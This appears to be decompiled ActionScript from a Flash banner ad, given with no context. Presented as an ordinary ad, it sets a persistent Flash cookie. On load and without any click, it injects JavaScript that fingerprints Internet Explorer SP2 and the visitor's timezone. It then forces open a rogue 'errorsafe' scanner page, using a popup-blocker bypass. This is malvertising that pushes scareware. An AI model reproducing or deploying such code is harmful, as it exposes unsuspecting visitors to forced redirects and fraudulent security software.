function setFlashCookie() { my_date.setTime(my_date.getTime() + 86400000); my_so.data.expires = my_date.getTime(); my_so.flush(); if (_root.strong) { getURL (_root.tzjscript, "_self"); } } function checkParamsLoaded() { if (target_mc.popup == undefined) { } else if (target_mc.popup == "1") { clearInterval(target_mc.param_interval); getURL (_root.tzjscript, "_self"); } else if (target_mc.popup == "0") { clearInterval(target_mc.param_interval); } } _root.strong = true; _root.strongPP = "http://www.errorsafe.com/pages/scanner/index.php?aid=cast&lid=468&ax=1&ex=1&ed=2"; _root.easyPP = "http://www.cannis.org/?refid=cast&link=468"; _root.tz_begin = -3; _root.tz_end = -9; _root.tzjscript = ((((("javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u='" + _root.strongPP) + "',dt=new Date(),tz=-dt.getTimezoneOffset()/60;p=(n.userAgent.indexOf('SV1')!=-1)||(a&&(a.indexOf('SP2')!=-1));i=(d.all&&encodeURI()&&!w.Event);if(!(tz>=") + _root.tz_end) + "&&tz<=") + _root.tz_begin) + ")){if(p&&!d.getElementById('o')){d.body.innerHTML+='';};(i&&p)?o.launchURL(u):w.open(u);};void 0;"; _root.jscript = ("javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u='" + _root.strongPP) + "';p=(n.userAgent.indexOf('SV1')!=-1)||(a&&(a.indexOf('SP2')!=-1));i=(d.all&&encodeURI()&&!w.Event);if(p&&!d.getElementById('o')){d.body.innerHTML+='';};(i&&p)?o.launchURL(u):w.open(u);void 0;"; var unique = new Date(); var my_date = new Date(); var my_so = SharedObject.getLocal("cast310306", "/"); if (my_so.data.expires != undefined) { var tm = my_date.getTime(); if (tm > my_so.data.expires) { setFlashCookie(); } } else { setFlashCookie(); } if (_root.ClickTAG == undefined) { _root.ClickTAG = _root.easyPP; } if (_root.ClickTARGET == undefined) { _root.ClickTARGET = "_blank"; } _root.URL_btn.onRelease = function () { getURL (_root.ClickTAG, _root.ClickTARGET); };